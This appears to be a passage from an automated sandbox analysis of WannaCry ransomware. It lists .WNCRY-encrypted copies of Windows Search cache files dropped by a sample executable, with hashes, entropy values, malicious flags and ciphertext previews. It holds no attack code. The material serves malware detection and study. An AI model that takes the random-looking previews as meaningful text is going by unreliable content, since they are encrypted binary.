                                Preview:WANACRY!.....{....]u.Q.IE..W.O0..>!..6.....\...KT.._.u8.../.0.I..o,..Xy^7G.$%..^.O)+&<V.'.]m...1..+.-.8..i..Q.U3(+5...vB.F.......z.\.D9.8-.9..cXKU.3.8.S...Z..P...........c.r..Q......\....M<.>.j.. s.k.d.Q..Q..$WZ.H..J.g.;.i4^B..4........x....t.E.R.O.T2..F.........v........^...&ZDF.x..;+5/w....{.:Ep~.`.Eg..'...........'...P.&....G/.........Tu_+.-.4.2....Ws..+M..O.t+.I.....<T.u*..|.1...l.h%M.....|.;.=.....v.H..N.....s....x....z....~~.u=..[...I.@..p...b...,h.....(.....E`0..}.o.Qw.,.r$@. !i.2..e_&.....V...S.^;..m6..7..+U.J..e.I?.:.T.r...!...X....^.S...RcW.e<......E.m...>...yt_...V...q...#.............|._.\....r...W1..j.Z.#~A...J..C..6.t.u9q..?aCL..^...Z.I.]..b...J..Kf.........J|&Y......&.-...0.'p).Q.U.s.....g....o.#.....f...... c.m..Ush..2.....b.F...e[cJa.h..T0....iE..$.$..=..*W.w.@[.Fo.N+.@."..2d..]=...J..[V....P'!%..j.B...j.|...^.s."K...Q1.~'....."..9.g6k.G.*....&.X./r..o......&+N......t.....wi....~..(UeX..P..'9)..\c,;..jp.....=Z..u.m

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsconversions.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1426184
                                Entropy (8bit):7.99985256158353
                                Encrypted:true
                                SSDEEP:24576:lYUm6gESFXPxnNydZgREymbTtJr4j/tTg8+WC2T0jOuG40Fmz5ze/bOzSU95:lYUm6VuPxN8mREDDr4j//TdwjlL4mNUO
                                MD5:813F957D188BB9AEDB7B137D1644EEE8
                                SHA1:03645D02A41D20A35556D3314BF1034D0CF99751
                                SHA-256:A8B0ECB27F2D496729C53F31E73A68BBFF1900AD1927D593DC05CF9238B215B0
                                SHA-512:7C122B2FDEC7CC03F75D39D3ACA5766A04552C60B690888A21F1216644F80010ABBDA063DCC11112C29EB25CB33F2F4CD05D8BA682E1BB42BCE596EABB077CA8
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......i.^.C..[.)..k.....U...iH.=2.G}........2....Q...lr.W/.R.n.$..c<'t..<t..=....Y.cn....Op\].^..D.........v..G.J#'7A...N...F.....E....[.q...T.t+.]A@.h....5G.g`h.F..%...u.8...1...j.'*....jW..Q.....I.p..).!...U\...d....I.f.V....N...a..y.P.(............ .d._8K@.bt.i.g...o.F..:..Q.D...p....+@o_......Z.1.4.p..YDb...V..h.iNx..cD_*.<_"./.....}...UiP...4QRi/....Z...r...u.thd.w..w.X......B.b.d...$=\.I....%Qs.....(.F..B..I1.....au..;.s.G...U.3(..A.....~.e.t..JF(...9.t)]2..#.).8..8..<{FF.%%M.......t..i"...]0/.$.m......6^...J._.....2...4.ko.f..[|....M....CyPU..... .i...C.c.d1v. .v.7.....H..!W.&..QQ.;s...|..dA..Z.../3V.[.zcyzB....J..(.H.`w.fi..t}T.+8.nQ...-....1u. .=..Mg}...7c.)|..E....o....R...S....x.k.S`mem..z..{...'.\bZ:....).t.....G.@..8D.{.&...y.....:.......,.P....s...t....1b-5/...0....?Io.T{...E......aiwr.f..O.|.iP.J.|....T....K.*..Q9.....5....ct...J.d8X.v.#......];<...R=.B...oU..$\o.I...Z..4!...J.p....sr...x=M.~_4\.H.E4.n......

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsconversions.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):533032
                                Entropy (8bit):7.999659495897816
                                Encrypted:true
                                SSDEEP:12288:2yJwTAbdc+r0ZHgqe4zLVbaV3L0/nOLhNl3GRznk4:2yi+UgqtzLVeL0/O1Nka4
                                MD5:591B90F98D96219113149C2EFAB64AD6
                                SHA1:F774CE49278C2B1C1FE9CF02EECA8E7BDF0B071A
                                SHA-256:B5742BEA35E49904E26332B99DCCBC6D343A6723EE330DB8DCCB2757C2DCC44C
                                SHA-512:68DC2FFAC7A0BEE938BB0148A066190EE791AE83C40858B558B1731B371D65D23994251D76EA0FD58F57CBBE2CACCA97331DBAB776F2A8A47EE64B0C4FDD5E9C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....@.>..4.{..P..).b.[-7,...R.#.m.....eR.n..c.`..+..Rf.&..9.h..~.&..&.,f...eE....M.L."..Z..y..~...$%v.."z....j...,.x'..:.L)..-.......{..&.....Y.....W.A.dFi...I........@4.A..G!Ek.r.p.2.......?.....f..z....M(..4.....Z\..S[..6q=..X..r..M.}.......!.......6.......Vs..W.]..V.3..0....zz......?z..%.<...i.*.bG........... L.2..a.F..g.:.V@..+.Y< ././.7.M..Ll...y......;...QSz...,....'...(.Z1...".."...$.d...p...\..(.`..G.=.ij...".#..Q,..?.M..K2....N.....(.[hoo".0..}LF.......a.l.K.G.^]..b......H.6r'....].4A. ..-@bT%Z,..T..ja.\.ge.+._...C..6.z..|...F]Xzr)A..~...Zc..Jr.i.{......WIl...m..]....~....G..?..u!.N.)...`.P..A.:]X[.A.`.@R#.'BO..T........40..q.W%....>C....<rT{.,.*.....-......c.Ow....\..3P}..<AO.....+..n.3l.5.-...K.S.4G.*-..;.-7.r.....*.....7e.9ta..GpZ.].z].p.$.iW..t...............-5O.%.c...VFH....;...C>..v.t..E:t.wl.B.i.*.(.y...cr..X8....3F..}'.a..5.vp.7.&....s.%j.....e?....[@.B......WX.......9.....{0..^........v../....1.i.x..8c.n.(.)..m.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsglobals.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):41416
                                Entropy (8bit):7.994988468993542
                                Encrypted:true
                                SSDEEP:768:3cTOxNi806JWLbi8sLWGRgCijcC8ff0hVgpc3CKiVhwjoKsCufbTROdz8FLwNayA:3nxND06qkP2CocC830h2pcR0ZLfbTRS2
                                MD5:1A187A2B1774759C4DFD6D69AD9009A3
                                SHA1:8A8165EEEE7531423E987266CC2633D56A70B0A4
                                SHA-256:86EBDABA82281471758265080FF1575524FE3D205AE1F87C7DB376F04E1D3F4B
                                SHA-512:8E072025B08128A9273B5963EB2F5EAA2F92D4422FB3388FD2F3E5E63CD865D7E3F33A8597159C12FACA9A5A540FD12B3E4831764433B01846A34FE61724B4ED
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......p.z...8.T..8.....S......2......;[yp.u6.}.9"V.^A.....vz.~.........%@....u;Y.BNh...\..oR. .4s..[..c1.k..l..8....nz....j.Q.LE.......s...F.C.jn...#!.<uh.....K.`...9.Z....+f...7[,:m.9....V.q+....t\.:.../....Wv.6..$0...v2.G.#..uQ.}.q..?...H}..A[p..............y....T.....t.H.l.u.|..h......[.}.tB..rRJO@....W..F..@.p...w....*......h..En..UR<.J.j..-b..2.J..37.......V.(.`..+.n.e).....L.lw.....4.....+I.T.-..O.ye..+.BA..xI$.BC..v.Nu..R.!d#..K.;{...+..Y.G=hf.ZQ.2....LIB....2......$.4.)R.1E.....b..L...>.Q..$W.Q]#)........~..6..[GF...$y..WQ...wv.&<g;......y.._+....y.S...\$D.........C...^..V:.....X......%.f..._.H...X.I_..."+...x.q...pa....M.,..H .-..Y.:#.&..%.0.z.s_?..#g...z|.-.0....N.+..1.4..1...\. e.|....<......v.`M5K..*MN%.?...M.l.8...+{5..i>`Q.%x...2...T.....w..l.....l..K.j....B.h.^..-?.....3...0.!i..w..r~E.Y....W.......$..:X'...#@{]>..E..a..p..g....U.....lu..Gd..E..VU.... ...]!....L%........v}...*<t.t......r+y..cO0....+.]x,...=.f/

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingssynonyms.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104008
                                Entropy (8bit):7.997942678580585
                                Encrypted:true
                                SSDEEP:3072:GL3S8nOckclagXrWUx0hXPx0lA3/rp9ige:m3kclMUx09Px0aPTg
                                MD5:B305178CA17DD882E9DB6E7CAAE731EC
                                SHA1:D28177762AD36B122E171C948E2F8CD15CA327F3
                                SHA-256:192088425ED9EA531BED8FEC82CAD9D89766E099DF63122745638D3A7BF15936
                                SHA-512:F9A78EF68E24DA9F393A661B0BC6F78803D168A5DD759F8D6BEF6B3D400C07E9D1B56C2A4334CA10B780E07023CC99FFDFDBC4C5B5F46EDE26DE9E9F13962FBD
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......m}....M....".h..z......K$..V.E.).,?.3.... #......y....#.g.m......R(.....>....nk......}..8,#....p.d...*aq.....4.V....[.x>.......EkqN.-..:qH....pTO..P.a)5).....|3...-.R.#e.D...#(.pUH..v.M.c..P..o^.^}.5G.\.e...!...\..;.:.A....Ij....D.......2.<.g....%.......R ..C.b.-..Nu....\......J.s.\.).Gw..Y.].i.Ic.f6...f..n)C.C. ..*..@...E.y...x..."+.q...+R.....+K.c0( ..6..>.....W..]g...4..'..H..\;....bL.l.......[...5.z ...9..K.Se..a.bp.....GJ2J*...g....e..;M....!...|P._Ny..9.....F...1>.EF.#-.....CV.{.....'$..N#.....K.i.%.m.nuNS.,..~NeC(.....x.hA.........t......@..8.......k....k..f..O..hG4..@.n;>.r.`.....7.......7f..;3....%.....l....F).....e.F...P....Q.....\q.4[...u6..g.zF."B..Y..{..7.<...(..Em.hy,..W.q.>.N.`...'j"f........CnAE.j..9..{. pl....i.4.y..~kA38....U.D...6........C..\Epzs".....f.........j..>~BQL..dg....h..r%..U..Q....5=.[a\.~...-..(2...^,vb.).B.-..6.o....u...1..3.X...u.!.r.............<..;B....{...x...~.e.i.f..@Ji&.cR...9n.r...n.&.Z....

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):214008
                                Entropy (8bit):7.999115649730841
                                Encrypted:true
                                SSDEEP:3072:In1xZ+e3Ktq8vmFtaOxEhC8dncApiqTVCjeS8vGa9xVTwOIMVrMx9VC69yogSI:I78+FtaOxyvNAqeetLrV8YG/UxT
                                MD5:0C806391C781CA24108D633DA53AD724
                                SHA1:1753FDA421478049A158F3169D61F267DA41272E
                                SHA-256:E1A5B3A39874138919F895AD7A8ABA7C8097C4B87A230EF55AFC461CDC7DD2F8
                                SHA-512:FBD8AF3B085844EE51551DA034A6CB7D8BF1E51715D243D337049209BD251F103C01CFA3D12F3E82A61133E11E570C65569D6C0FAB6E7D6DF7D5B07E01F93397
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....)!..:..-r=.v.W....>....`...a...LZ...X].j.....c.{.G..R....>../....U.YJ;u.'...Bj....Kpl).=......f.+.j..RD:......|.S....l.4+l.S.c>.7P.&.3..?..4.]f...+.s`.!..Q.qqD}.(...K...a.mr..=.%.*..xT.....g..G%.b$.S#....3.`........:EXR6...=..G:...9!FS.)....m.G......B..........a....6..z.....B..W.`.....v-..),vt....g....V...c4...2....K..).;..!.wV[J"..a.&......1T#.t}...8D.R5...VZ.[^.(.?.../.N+*7=+..|>D.....^dSa.Wl=0wM........M......N...~........N......iT..(.......~.T.!..E..m..=S&..m...<m2..Vv./yK.S.R~...(j.ae.......BF.K.g.E.....E.+.s....B'.(..Q.0.P.h....\g...L.....L.8...d......5..*..{..q:.5.Q.5n...#S..0.+.....jK..hN=mY..3sP$.,..G.s..n.@.C...0f.G....z..'.........s).\....<*......n%|...h..~&..{^%..;'..V...x.W.....LB.<..Ix...yt.B......Ufk..F#.k1...1......v...j..8.."!....^.R...>.............y..R......m."/yn..|.;.7n=.~d|.h.F.....m..%.0I..c3/p.Gom.M..C..a.9...D......9F.s......n.l{..T*f,X}Z. ..0..y.....@E>z]k.M.2xb.....?1Nu..3...Sv...kz`q2.l..Z.....z..d..!..

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):214008
                                Entropy (8bit):7.999118288275091
                                Encrypted:true
                                SSDEEP:3072:OEL+8IrOKOX/zWDQm7Y8G6YVViHbVWe8tgLWk4emlKxHXhGGi7kI6iDCU8hy0nM3:vK/Vf7Y8G/VVCZWHNl9i3hp4DCBYCA
                                MD5:C491AD13994FFF8A13F7F72403CD0337
                                SHA1:42D496FD32D18218EAD6DD5D5CE19AC0FBC687A4
                                SHA-256:199085E90AB4AD3403089C7E6D7F4FAB9005098D587E1BD0DE04DB901A13B486
                                SHA-512:E54B5102FD343DB95D0056DBB5FB2B8D35D7DD321DEE852B7D2C69B1B54F3301619906D2D7936CFED95C19C52D3214EA69844BB81FCB4AEC30A5DBFCB6614A83
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....#$".5........]..OGU..YN_M..X..hu....H.|...,.L.2.tM6F..R.....8.....t..z.......Y/.Ns}.f.}:P.........a....2R...6.....q-....E.,.|.A.Q/.r.B..$.....l(nkgXV(........"?.....+..l..Y.....N3s...yg..1......?...p..8`..v3^..@~:0.Q+.Xsb...yt..QY(j..r.L....F..`.......B........y..U._..~...G.t.E..d.SG.q....7O.zR.6..Nb...L..m.}.F&...&u,^..O..epF....x..8.x}..Vz...J.^..;2..,...~=...x.U..g...r..=.=.4OWE.. fJYh.".Z............/..o>.Q..........H...1....mpi...ud........F.....QL.1..r.m......,..8"s.tT...4.........o..$.t....3.t&l.S!2...%.....$0.G.....jW../_......n...Xv..5..*.....{...RC.....^@X@.n..`p-l.L:..obc.X.7...x}.....<..:....h..L..!....-v..l`w.x.3.`. ..A ...(.CD4._B......J....2}.S....d.[B.c.0dc./HB.m`.+ .+..n..i.}bt_.A!.4..6=.~..X.6#L.......e.4.j."s.D.....O.......&!.7..p....bd..~...8@..o.^ld..h.:....2Ln......w..!..~.}#J..3.$.....@..2.H..(........2s^.e....l.ZX.%...^q....ep..#x..6.3.a....a.. X|.K.}...(.@.O&7...8.g..F.6.)L.oi.A&mF....-l

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):202120
                                Entropy (8bit):7.999126120005269
                                Encrypted:true
                                SSDEEP:6144:hCAApLJlOsCdO3WNB1xovqaPnpoq7byNcV1j6P5D778NQ:hFAlAObdnlmyV1j6NCQ
                                MD5:E8E2DB3E66C5218858E0F002DA4EA28E
                                SHA1:3E0235C1E79116012371460108BDCB4CE7406D01
                                SHA-256:A547D6B0DE1CDB319784F1AB0C16C7FAB7A20CF2A44CDED1FE1B5D972D4DB84E
                                SHA-512:6ED6C639F2A35E821CC76AA601C85CC89C5EC1C3CFA4810B848C30F8D308E77C9D65B269B0B6DE73403F121302A29383DA86D7DEF1B5ABE7AAC092658A2E8F10
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......|."..G@.....kSw.g. ^)..S..7.Sh #"<.%w...zs((&t...Y3..4HX...+Y....>.D..;qJ..,.....u.U.n....7......[.?.}.,...l,..X.. .Y...r....".._.k..J3..j.G...9....q....@...X.Q...+%C..%......:..lV"2d.j.Y#Ko+.....2.!e9K...2...C.&.P.-o7..-;.^*........B..U[.w..>....c........R....@_.....6....R...g8o(a..8.... $..>.{Z...M....%>..b.#.Y..z\.j...2.z...w....J.^TT..I.HF..4..@..........3.....J....^.I..........S.[.c..O.@v...f....SC.w..9.z.......0W.W..7l73=......f.,...9...9L,(..Z..a.=.. 0$..c...U(..)......%...+.....|.U3..M.,Xe......W9.L..x....Q..'u\]w^.-.\Yt.... QK........_#D....a.s"K...N$...k. u3.......VZ.H....<......!...Yz.......FnI.@Hy..........sb.W.}}.Ui.....a...t.3.u..L.s.y'...N.k.=..(....Q...n%5.....D.M..8.-..;..s..w.....x..y.p..?SR.".n.D...,.G..mg...E..5]..iT..a.-.c.CS.ZE..w|...8.........F..Y%m.H..../.C...Z.JI...j..+H.z&....p..U..D..h.ljMdt..{KgE:S2..uA.%.4.;.@..j`p:S.DEu.5......P.......%.M$...5.......G...D.k.e...F....%......JUl .7.(.F..{.../.T.JR)...'

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34536
                                Entropy (8bit):7.993831646181793
                                Encrypted:true
                                SSDEEP:768:399lNk5XUX/1l7iKC/wd1JQsqe90qmesYTlFU76mlP6e50Be:3nrk5DKSwnJfqeyj5KC/V50Be
                                MD5:A53D7DCA9829F68D76BDA2274AA058B7
                                SHA1:85A998F032BC98EAA1B2A3D9DD40BC40958CCAC2
                                SHA-256:920E373F07E017259533195050AA630B78C0610F5EC68DF1A5EA0921C50B6E01
                                SHA-512:12CC1AF3ABFB117ED499091574524F8663F7A255E43AC5286B0975A91F5E50B26F59388E637C0E83A6EEA6A084C00BA05BEB11610DA4EF312A28EA0035B33C87
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......)....?.>..z...K6/f'.IY.Xt.g...+.i.$.@8.#"\..D....B =...b+..f..CS.[^=.../W.-'.e.`.8..`.....E.X@u.....!qxPP...v.$....F.1m..fP..T......"..' -.qr..?g2.`8.P.(k9Z...:-_o..a..n.2U.`...7...?.R..!.s.O..T{..}B..,`...BC....e..#U...-.)..rOK..+(....DD.P.:............LHg%.0...........>....4.P..N.e.oNq...:.6.._..C.....+sl....@..^Y.J.d..h....Kh.5M.4.}.bP..B!............`.R.%..k.q2.(...K..z\.z|/...7.p..i.~..*..YF...+1X.\k{.......g.......$..w..V#N..o.u....?w.+1Nf..Q]..2.D.pgBMW[.J.+..Y..|...]s.6.Q.....g.........A.a.....>....W.99.....).{.P,Y.G.3[jw.Y.m........3.G.9t.....=2D..ST......rhE...C.Rw.Vj..y.......v>......@.7..[.$...NxH....Kt.t.=.....v.!a....A{.e5......r.....(....;.`..jx....R..Y.g.t.....p{V.;..?..Xh..<$.-..W,.V..-..I.5H..?D R;..u.'.S~h.e....s..h...qd.J.8x.rvYeys+/9....n(.......2.......G...:..A.....#.....ox....d..1*..T..NE.msg..%.a.N..%.Ef.........-.>mI.+.yb.#N.m}[......:...[ld...?.+A)Lu..t.(....V.._..F.........((....**.78:zU......S.J<M.$..

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):227064
                                Entropy (8bit):7.999231559643118
                                Encrypted:true
                                SSDEEP:3072:WSYlNdXtAaEBvlFIZj3lO2V94sQFOwwTCnLVWTjkutnlGEzw8XV5Wz1SOXGEeWs/:WdXuBzGJQsQHnLQtlGpKV5YmP
                                MD5:040DEF7F2E02E0BA692E9817BDA476E6
                                SHA1:F701EEE53E361FBD9606E589A034859E48606299
                                SHA-256:7B4D767F21D1051B1798467E73F88CEFA10F8376848889F723C408B38709D801
                                SHA-512:F07ECC74BA571ABF128556777D22872E764E16BB8E86E1F04F6A90C3AD1D3F037663D090D272D2531C34D137F0EC0CCEDD0156D83006076F7755DAE090D450E4
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......!k}U..x.8....{.{B....0).+.......M@qi.... ....!7.h.oqE..........>.#...b,>....o.0.E%.......*<...OB...v5.*...o#...0.-.m.+.1.T3.-.G_.%7.J+.2R.l...P...`.....s......X...-..o....F./.o`._t+...C.#.3..Wlp.8..Q[.G....K<..1ef_..X..J.......+.y.>s.Q.`.5.B.......u.......~.]...S.@.."FH...Jo..i).HA..Md.c.d..].!......2Y......(..H...w..2.Cv.d...........S.....\h`R...V.......].C."......'...%..<.k.<O.TT.o.?W... Q..r...Gu......?:..D.v"9...2=.....($.. ...uni...Uw..shO.*.2.l.....Q...t[......4J.+.y..!2Q}.Un=..o..../.gIL.e$)..t.P|sUm.2. Lf..N.;.M.A..'....%........#!g.,.w.l.'X.a....e..p..DiR_....V.....`yp.z..?..M...d... ...../.././..+..x..3 ........Qg./9o1`..=..).......P.>.....7.!..}..".K7.g]j..<(..1ys~_W....Mm..B......(.dL..'I.t]!M9..8].^8...^K.. y..+.%....k0.r...L..W.+...).....i)P..v...L,...P..k...PO..^..C..6<.U.t.Y..c^1U.....*..AV..fb..y.^k..|...?...~&|..:9,...Tg'.04.P..c$8(......C.,d%..:..)..gU.-...jaW.tBB.D.r.4.`..J...J.]r... ...5...C.......|?b

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):53752
                                Entropy (8bit):7.996427760791523
                                Encrypted:true
                                SSDEEP:1536:NolrOnkcP0a94UigxECyMoPwo2L7xBGWtGUoOa:NoInkQ0a94UBlFoYL7xBvGUoOa
                                MD5:C3D8D45C59F92718948AC48CE1462847
                                SHA1:1C9E2AFD9C663596B9E4943D46C932779A14F9E2
                                SHA-256:A13D9CD068271FAED6F915C3A33CD0355679D90FDE0D2CEFF51B043B9C1D2D29
                                SHA-512:478EACABE6DD79F45E073AD13569F6914411811F4F66348C6A025396EAC6764DB686CA769F81C183BD3002B21041615B8A1BC83D765BD9EAABC4F58A79531F59
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....n...oA.R...EY.qk.v.bW...........0..o-....[.<.....QH.s!.........>O.yo...^...F..{...Q,p&....5.zU..Z.M......M3.......)....L...\n=.....f...U....#.....2/L.m.........&..!.OL. ".n..".......7.NL"l..=.{..+..*[.K.....l..M[.E..L.).~B1x.....j.3bS....P..y.tZ.h.......................+.RyYv.l.i.'.6.e`.6../w{0.l.\.DV..Nl....zN.cw).2c;.2l.-.N1.....\..4..S.&..q.i.x..W3v.%.*...#;..2].Mh....^.^.}].....r..|...#C..3...r*.0..<[......xy[#Jx.......,U.O.....@...T.S..Z4D..s"......\~K\eO.!..y..u.....[...S.<...&.....9...3K...j.N......j.8.i...g...o1.w..Z ..u.G.,...d.t.J............8.LcT.3.=..../.......+i...y.F.f.9o..&.a.....g....D.9..a.....X......Uo.E....6]..2.;^..qS..:.U......#..\*x4Q.X[...1..W[.z....w..V.+GF.2.c.V.i..l..Z.!aG.z.b..f8..i..bU..yX...m.&=2....0.yq5v.Z.\d\.;I.F..p..<CsJ6Y....W..fZ.4c.g..i.t.....4R...n...O.?.1H2.9.YrNq..(.....I.. Z....`Y6..lr...~4J5S.Z>_./2.}}m{.Zm?......D...F... ...kE...).%/.y.h..G..<....,d./\sL.<YYJk.....0.j.Z..q*C..Y..OqT|j.s.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_14[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8008
                                Entropy (8bit):7.978936479330439
                                Encrypted:false
                                SSDEEP:192:rcpj1mDlQEeAiOk2VnC0vkI6WLF1tSjCvo+v7xc8zh3h:rcpxMzxVnPdLF1tQwdcY
                                MD5:D5530D469E94DDC467FD6ACC992AAAC0
                                SHA1:8C4B2C6DAF2025C81EAC510DBE04A00A708C59AF
                                SHA-256:4AB86518B101DCCD16BB1149DC0582D2FE4540EF7F9FA633E0E7F69CD9E2C382
                                SHA-512:2C2994DA7D6B49CC21A6FF9ACC952ADD289155A4081CA21E274E24BC246DE9978A6F5D2352CDC57F95DA1BEAAD7F7343ED578DC917B6F6A328816BCA58F871A2
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....U^....?.....J,....O.S9....f..u.....A.=.O....ay..W..z....$....j.l......p9eJ.a...........b..~.5..\.VC. .l....0..p..$....34FD...2..<H.S}_..el.q..<..sY..Y...W..&i/.&..*u...N7.,2ge.d}o.i...L........s0.*...0..r.kg.C.x...&+..L.>.t..hc.34J..P...Ji.OQ............k....w...kub.Y..q.)..^.1..D!.+4.oJ`.........{...T..c.J.....4.....>.v.qD........n.WSD....`....43.6][|..[.5Ij.yz.\}.:..D...m..a..>z..99.@.L..n.;D.x8.lY.?A...1,7.55S....l%.B.2.rbi..@....Y....'].xn...7.d...6..U.%...1..,f..Q.....P.q......b.*........,m.E....6...;....b....Z..~d.R.K>.r.9h......\<.%3.C.-).$?o...(...n..U..,.:./.kx.i....my.T..M.].P.<..,...7...)..A.>...<....-..k.^...........].n.P.`..Z.....B;..4.....7..;jU.a.....D%.......t.....N.w.!*.O...J..".Hz{.J1....\.h......6.Qx+*X..L....,..&Y.Fw.u.t..[h..{...cm....0M.?.!.....x.fs..RgL....t.`..4..a..s..]X....V..h..c..7n...]y.L.......O....R..B..F .C4...7X6c..u...%..kc.y..O.....~.-.\..C?.......y..y^....:.W.$.k]....%,....8c$.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):123256
                                Entropy (8bit):7.9986258075867225
                                Encrypted:true
                                SSDEEP:3072:j4Ke2RHIRO9jv2HECyEZYauidFP3vY2rw8Td+3UaQnImlIWSG3:s92RHI+jv5sYa5dFPvTrRd+3UamlIy
                                MD5:0804D533853E52F3A2E72FF8C089FF36
                                SHA1:FBFCB66951D0C7D4FF3718BB2ABA99C3BC09F1C6
                                SHA-256:B01B97660E09FF896699C7A27A83FA7B5279A2650ADAC28CB0839614FC59D2E2
                                SHA-512:273006BBD3BA1A03BF9937DE3097A6B9153B7B05DB75D95D377DB7EC8D9E75014F004843E96671CEEC400305EA91F026623D372FA7A78E1C369765813D0D4B27
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....1z.`.H.Q.&n]."Ot...K...^&{u<.c........Dz....S...W.N..U.G.IK`&...T..s.....q...Q.......~..Z#.u..j....B.[B...9.@E..U9..........[-..+....(..4b...a.9....B.m...<..+.. D..J..B.......=.M.of...?...4.o.......7B)]}.O..;g...->|W.z.$.n..Q........PC.#b...".....Z..........z....d..8.7D.hW.Z>Idc.~...BH...K.0#.M.....,9._.....*..S..^.I..,........Yh....8....&.A2.........u.u.W...3+.......C\...#...W..,GM..eL....3e...?....U.i...r...a..;.G%.DR.B.HF.;.U15...^.o...."....'.l....Sm..;/%.........0.d....-....9_!.6b...?.G.....d.7=!.i...."..:'....0...t....FPF.|...P.B.^..%...D...b.P.G'(.....g..fd...9...N..a+}"..o........v(..G.....|I.<?...:N..RP.....Z>R.w...$v..G?._={Ow...I......V.].}.X..$r... .Q.....Z.....W..n00..I$..+C.Z..=,f..|MM.V.>g....N...x..Q\..>..+7.j4.....JR..@A.0.'#........".1/....tz@..3...x.g.?{.o.........98...l.{K...8&.tE..........@.....I8QXz...>.!Vl.\P...s..p.. .....eu2...}'..G..&........3..y..2.^.X....>$...W_c.........`.r.M..e..h.&.....G..&..]....

